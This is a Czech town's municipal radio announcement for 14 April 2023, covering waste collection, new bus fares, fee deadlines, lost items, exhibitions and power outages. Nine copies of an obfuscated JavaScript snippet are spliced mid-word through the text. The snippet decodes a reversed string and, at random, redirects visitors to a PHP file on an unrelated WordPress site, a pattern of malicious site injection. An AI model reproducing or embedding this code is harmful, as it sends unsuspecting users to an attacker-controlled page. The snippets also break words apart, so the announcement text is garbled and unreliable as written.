Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 14. dubna 2023

Pátek, 14. dubna 2023

Z ÚŘADU:

Ve Žďáře v zámku, na Vysočanech a Vodojemu budou zámečtí hasiči svážet železný šrot a elektrospotřebiče. Svoz proběhne v sobotu 15. dubna 2023 od 7:30 do 14:00 hodin. Těžký nebo objemný odpad hasiči pomohou odnést, je třeba se předem telefonicky domluvit na čísle 721 064 978. Hasiči nebudou sbírat nebezpečný odpad, jako jsou žárovky, barvy, baterie a další nekovový odpad domácností.

Od dubna 2023 došlo k částečné změně ceníku městské hromadné dopravy. Ceník nově motivuje cestující k bezho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovostním platbám. Jízdné placené bankovní kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou bude stát nově 10 Kč nebo 5 Kč za snížené jízdné. Platba ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově se naopak zvyšuje na 16 Kč nebo 8 Kč za snížené jízdné. Beze změny zůstávají ceny všech druhů časových kuponů, občanský, studentský i zlevněný na měsíc, čtvrtletí nebo rok. Bezho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovostní platby jsou nově výhodnější a urychlují odbavení u řidiče. Více na webu dopravce www.mhdzdar.cz.  

 

Odbor komunálních služeb oznamuje, že se blíží splatnost poplatku za komunální odpad, který má být uhrazen nejpozději  do 30. dubna. Poplatek můžete uhradit bankovním převodem pod přiděleným variabilním symbolem, nebo na pokladně městského úřadu v ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovosti, nebo platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. Bližší informace poskytne Bc. Sylva Pikulová na tel. čísle 566 688 187 nebo jsou k dispozici na webových stránkách města.

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány diář, zelená karta, hrnek, mobilní telefon a rezervní kolo. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

VYHLÁŠENÉ ZÁMĚRY:

 

KULTURNÍ POZVÁNKY:

Knihovna Matěje Josefa Sychry Vás zve na výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Pavla Remara - Dvorečky a Dvorky starého Žďáru, která je umístěna v Čechově domě do konce dubna 2023. Dále pak až do konce dubna 2023 je možné v Galerii u Sychry zhlédnout výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Jaroslava Provazníka – Místa, co určitě znáte. 

V Regionálním muzeu na Tvrzi probíhá do 24. dubna 2023 výstava Retrohrátky. K vidění budou hračky éry socialismu a také interaktivní dětská herna. Uvidíte například Rubikovu kostku, plechovou berušku na klíček nebo céčka a některé věci si budete moct i vyzkoušet. Více informací najdete na webu muzea www.muzeumzdar.cz nebo na Facebooku.

VÝLUKY:

EG.D, a. s. oznamuje přerušení dodávky elektrické energie dne 17. dubna 2023 v době od 7:30 do 14:30 hodin na ul. Jamská 1671/31 (COOP družstvo). 

 

EG.D, a. s. oznamuje přerušení dodávky elektrické energie dne 18. dubna 2023 v době od 7:30 do 13:30 hodin na ul. U Křížku, Žďár nad Sázavou 3 

 

KONEC HLÁŠENÍ